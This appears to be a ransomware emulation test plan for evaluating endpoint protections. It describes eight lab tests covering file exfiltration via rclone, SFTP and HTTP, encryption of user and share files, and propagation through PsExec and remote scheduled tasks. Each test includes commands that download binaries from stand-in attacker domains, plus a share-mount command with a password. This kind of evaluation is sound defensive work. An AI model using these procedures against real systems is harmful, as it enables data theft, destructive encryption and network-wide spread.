Ransomware Protections Micros
- From your Kali attack host
corsair (
, open a new terminal tab and run the following commands to start the C2 server for protections:
cd /opt/kalidev/evalsC2server
sudo go build -o controlServer main.go
sudo ./controlServer -c config/protections.yml
- ⚠️ Ensure that the C2 has started with the
[Simple File Server]
handler enabled.
Test 1: Enumeration and Exfiltration via Batch Script and rclone
🎤 Voice Track
Test 1 emulates ransomware affiliates enumerating via batch script and
exfiltration of files of interest via rclone. The setup on the victim
host for this test includes pre-positioning of a batch script on victim
bts (
in C:\Windows\Temp\test1.bat and opening an elevated
Command Prompt as sonicbeats37.fm\yoona.
The test begins with execution of the batch script. The batch script will
enumerate all user Desktop, Documents, and Downloads directories, create
zips of files within the target directories, then exfiltrate the zips using
rclone to the adversary server at m1sfir3d.blog (
. The batch
script will sleep for 30 seconds in between zip creations and rclone
🔨 Setup
From your Kali attack host
corsair (
, open a new terminal tab to setup therclone
server to receive the exfiltrated files:sudo rclone serve webdav /srv/http --addr
Ensure the Simple File Server handler is enabled and running
➡️ From the Windows jumpbox
spitfire (
, RDP tobts (
if not already connectedSearch for Command Prompt and right-click to Run As Administrator
Download the batch script from the adversary server using curl
curl --output "C:\Windows\Temp\test1.bat" http://m1sfir3d.blog/files/test1.bat
:biohazard: Procedures
Execute the batch script from your Administrative Command Prompt terminal.
📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).
🧹 Cleanup
In the elevated Command Prompt withing the RDP to
bts (
, download the cleanup script using curl.curl --output "C:\Windows\Temp\cleanup_test1.bat" http://m1sfir3d.blog/files/cleanup_test1.bat
Execute the cleanup script.
🔍 ATT&CK Techniques and Reference Code
ℹ️ NOTE: Only the techniques under test are listed in this table
Test 2: Windows Exfiltration: Archive and SFTP
🎤 Voice Track
Test 2 emulates a ransomware threat actor attempting to zip files and
exfiltrate them via SFTP on a windows target. The setup includes
pre-positioning an executable file on a victim host
bts (
at the location C:\Windows\Temp\test2.exe
. A
command prompt window will be opened as user yoona
and the executable
will be run without arguments.
The test begins with enumeration of all user directories inside of C:\Users\
Any Desktop
, Documents
, or Downloads
directory will be zipped into
individual zip archives. The executable will sleep for 15-30 seconds after each
zip file creation.
After all of the zips have been created, the executable will establish a connection to the attacker-controlled SFTP server. Once established, the executable will upload each zip archive to the SFTP server, sleeping for 15-30 seconds after each upload has completed. Finally, the executable will output the list of uploaded files in the SFTP server.
🔨 Setup
SFTP Check
From your Kali attack host
corsair (
, open a new terminal tab and execute the following command to ensure that the SFTP server is running:sftp sftp_user@
After successful authentication, run the following commands:
pwd ls
If the server responds without error, the SFTP server is running correctly.
Executable transfer
➡️ From the Windows jumpbox
spitfire (
, RDP into the victim hostbts (
if not already connected.Open an elevated command prompt and execute the following command to download the test binary from the attacker server:
curl.exe --output "C:\Windows\Temp\test2.exe" http://d3fend-ev1l.radio/files/test2.exe
Change directories to the directory containing the
binary.cd C:\Windows\Temp
:biohazard: Procedures
- Execute the test binary.
After the executable has finished running, check that zip archives were uploaded to the SFTP server:
➡️ Switch to your Kali attacker machine and open a terminal tab.
- Run the following command to log into SFTP:
sftp sftp_user@
- After successful authentication, run the following commands:
If there are zip files present, the test completed successfully.
- 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).
🧹 Cleanup
- Run the following command to remove the created zip files from the victim host, and then check that there are no zip files left and the executable has been removed:
del *.zip
del test2.exe
🔍 ATT&CK Techniques and Reference Code
ℹ️ NOTE: Only the techniques under test are listed in this table
Test 3: Enumeration and Exfiltration via APIs and HTTP
🎤 Voice Track
Test 3 emulates a ransomware threat actor attempting to zip files in 1MB chunks and
exfiltrate them via HTTP on a Linux target. The setup includes
pre-positioning an executable file on a victim host
lisa (
at the location /tmp/test3
. A
terminal window will be opened as user user2
and the executable
will be run without arguments.
The test begins with enumeration of all user directories inside of /home/
All files found in the Desktop
, Documents
, or Downloads
directories will
be zipped into zip archives up to 1MB.
After all of the zips have been created, the executable will upload each zip archive to the adversary server via HTTP POST requests.
🔨 Setup
Ensure the Simple File Server handler is enabled and running from your Kali attack host
corsair (
➡️ From the Windows jumpbox
spitfire (
, open Powershell and SSH into the victim hostlisa (
using the following command:ssh sooyoung@
Execute the following command in your terminal to download the test binary from the attacker server:
curl --output "/tmp/test3" http://c4sh-m0n33y.fr/files/test3
Change directories to the directory containing the
binary.cd /tmp
Change the binary to be executable
chmod +x test3
:biohazard: Procedures
Execute the test binary.
Check the control server log to ensure that the zip archives were uploaded to the attack host.
📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).
🧹 Cleanup
From the
directory, run the following command to remove the created zip files and executable from the victim host, and check that everything has been successfully removed.rm archive* rm test3 ls
Terminate the controlServer via 'ctrl+c' from your Kali machine
🔍 ATT&CK Techniques and Reference Code
ℹ️ NOTE: Only the techniques under test are listed in this table
Test 4: PowerShell Script Encryption
🎤 Voice Track
Test 4 emulates a ransomware threat actor attempting to encrypt files on
a remote windows file server using a PowerShell script. The
setup includes copying the contents of a PowerShell script from a non-victim
browser. A PowerShell window will be opened as user yoona
. The script
will be executed with the appropriate arguments targeting the mounted drive of the
managed remote file server.
The test begins with enumeration of all files and
directories inside of Z:\
using Get-ChildItem
After all files have been enumerated, they will all be encrypted using
an encryption key generated by the test4 application.
Target files will be overwritten by the corresponding encrypted contents.
🔨 Setup
➡️ From the Windows jumpbox spitfire (
, RDP into the
victim host bts (
as sonicbeats37.fm\yoona
if not already connected.
Search for and open PowerShell
➡️ In a Browser on a non-victim machine, browse to test4.ps1 and copy the script contents.
➡️ Return to the RDP to
bts (
. Paste the test4.ps1 content into the PowerShell window and press enter.
:biohazard: Procedures
- Execute the test with the target file path.
Execute-Test -action encrypt -startFolder Z:\
- 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).
🧹 Cleanup
- Rerun the the test4 script with the
Execute-Test -action decrypt -startFolder Z:\ -key [KEY GENERATED DURING ENCRYPTION]
🔍 ATT&CK Techniques and Reference Code
ℹ️ NOTE: Only the techniques under test are listed in this table
Test 5: Remote API and Library Encryption
🎤 Voice Track
Test 5 emulates a ransomware threat actor attempting to encrypt files on
a remote windows file server using third party libraries and Windows API's. The
setup includes pre-positioning an executable file on an unmanaged victim host
eyescream (
at the location C:\Windows\Temp\test5.exe
. A
command prompt window will be opened as user yoona
. The executable
will be executed with the argument Z:\
targeting the mounted drive of the
managed remote file server.
The test begins with enumeration of all files and
directories inside of Z:\
. Any file that is deemed not a
system file, sym-link, or directory will be added to a file list.
After all files have been enumerated, they will all be encrypted using
an encryption key generated by the test5 application. The executable will
sleep for 250-1000 milliseconds after each file is encrypted.
🔨 Setup
➡️ From the Windows jumpbox spitfire (
, RDP into the
victim host eyescream (
as op1
if not already connected.
Search for and open Command Prompt
Execute the following command to transfer the file to the victim host:
curl --output "C:\Windows\Temp\test5.exe"
Change directories to the directory containing the
binary.cd C:\Windows\Temp
Execute the following command to ensure the
network drive is mapped:net use
If the Z: is not mounted to
asix (
, mount the share and enter the password when prompted:net use Z: \\\D$\data /persistent:yes /user:sonicbeats37.fm\sooyoung Dental-Crew
:biohazard: Procedures
- Execute the test binary with the target file path.
C:\Windows\Temp\test5.exe Z:\ encrypt
- 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).
🧹 Cleanup
- Rerun the the test5 application with the
argument and unmount the file share.
C:\Windows\Temp\test5.exe Z:\ decrypt
net use Z: /delete
🔍 ATT&CK Techniques and Reference Code
ℹ️ NOTE: Only the techniques under test are listed in this table
Test 6: Bash Script Encryption
🎤 Voice Track
Test 6 emulates a ransomware threat actor attempting to encrypt files on
a Linux file system using OpenSSL in a bash script. The
setup includes pre-positioning a bash file on victim host
lisa (
at the location /tmp/test6.sh
. The script
will be executed with the argument /home
Once the script is executed it will begin enumerating all files and
directories inside of /home
. Any file that is deemed not a directory
will be encrypted using an encryption key generated with OpenSSL inside
the test6 bash script.
🔨 Setup
From your Kali attack host
corsair (
, open a new terminal tab and execute the following command to transfer the file to the victim host:scp /opt/kalidev/LockBit/Resources/payloads/test6.sh sooyoung@
➡️ From the Windows jumpbox
spitfire (
, open Powershell and SSH into the victim hostlisa (
using the following command:ssh sooyoung@
Adjust the bash script permissions to allow the script to execute:
chmod +x /tmp/test6.sh
:biohazard: Procedures
- Execute the test bash script with the target file path.
sudo /tmp/test6.sh /home
- 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).
🧹 Cleanup
- No cleanup available for Test 6. Reset
lisa (
if needed.
🔍 ATT&CK Techniques and Reference Code
ℹ️ NOTE: Only the techniques under test are listed in this table
Test 7: Propagation: NetBIOS and PsExec
🎤 Voice Track
Test 7 emulates a threat actor that uses NetBIOS scans and PsExec to propagate across Windows devices in a network.
The test setup includes pre-positioning an executable file on a Windows
workstation bts (
at the location C:\Windows\Temp\test7.exe
A command prompt window will be opened as domain admin sooyoung
. The executable
will be executed with no arguments and will log activity to test7.log
in the
current working directory.
The test begins with discovering which local networks the workstation is on and
scanning those networks with NetBIOS lookups to see which IP addresses respond
as Windows machines. Upon having discovered at least one Windows target, the
test binary will drop an embedded PsExec binary to disk at C:\Windows\Temp\pm.exe
and run it to copy itself and execute itself on each target. The propagated
processes will attempt to run as the SYSTEM user.
🔨 Setup
➡️ From the Windows jumpbox spitfire (
, RDP into the
victim host bts (
as sonicbeats37.fm\sooyoung
- Search for Command Prompt and right-click to Run As Administrator then execute the following command to download the test binary from the attacker server:
curl.exe --output "C:\Windows\Temp\test7.exe" http://off1ce-p4p4r.co.uk/files/test7.exe
- In the Command Prompt window, change directories to the directory
containing the
cd C:\Windows\Temp
:biohazard: Procedures
- Execute the test binary
If the command prompt window remains open, look through the terminal output to confirm that NetBIOS scanning found at least 1 target and that PsExec was successfully dropped and executed against the target hosts.
If the EDR tooling closes the command prompt window as part of its blocking process, open a PowerShell terminal and run the following command to view the log file and determine how far the test binary got prior to the block:
type C:\Windows\Temp\test7.log
- 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).
🧹 Cleanup
- Open an elevated PowerShell prompt on workstation and execute the following:
rm -force C:\windows\temp\test7.exe
rm -force C:\Windows\temp\pm.exe
Invoke-Command -Computer exo -Scriptblock {
rm -force C:\Windows\test7.exe;
🔍 ATT&CK Techniques and Reference Code
ℹ️ NOTE: Only the techniques under test are listed in this table
Test 8: Propagation: Network Share and Scheduled Tasks
🎤 Voice Track
Test 8 emulates a threat actor that uses remote scheduled tasks to propagate from a file server to hosts that are connected to the file server's shares.
The test setup includes pre-positioning an executable file on a file server
asix (
at the location C:\Windows\Temp\test8.exe
. A
command prompt window will be opened as domain admin user sooyoung
. The executable
will be executed with no arguments and will log activity to test8.log
in the current
working directory.
The test begins with enumeration of all hosts that have a connected network
session to the file server. For each discovered host, the test binary will copy
itself to the C:\Windows\System32
folder of the remote host and then create a
scheduled task \Microsoft\Windows\Net Session File Management Task
on the
remote host. The created task will automatically execute 15 seconds after being
🔨 Setup
➡️ RDP into the victim workstation
bts (
if not already connected.⭕ Disconnect (do not sign out) from
bts (
➡️ RDP into the victim workstation
exo (
.⭕ Disconnect (do not sign out) from
exo (
➡️ RDP into the domain controller
blackpink (
.⭕ Disconnect (do not sign out) from
blackpink (
➡️ RDP into the victim file server
asix (
.Open an elevated command prompt and execute the following command to download the test binary from the attacker server:
curl.exe --output "C:\Windows\Temp\test8.exe" http://p1nk-p3ncil.net/files/test8.exe
Change directories to the directory containing the
binary.cd C:\Windows\Temp
:biohazard: Procedures
- Execute the test binary
If the command prompt window remains open, look through the log messages to confirm that host enumeration, remote file copies, and remote scheduled task creation were successful.
📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).
🧹 Cleanup
- Open an elevated PowerShell prompt on the file server and execute the following:
rm -force C:\Windows\Temp\test8.exe
Invoke-Command -Computer bts,exo,blackpink -Scriptblock {
schtasks /delete /TN "\Microsoft\Windows\Net Session File Management Task" /F;
rm -force C:\Windows\System32\test8.exe;
🔍 ATT&CK Techniques and Reference Code
ℹ️ NOTE: Only the techniques under test are listed in this table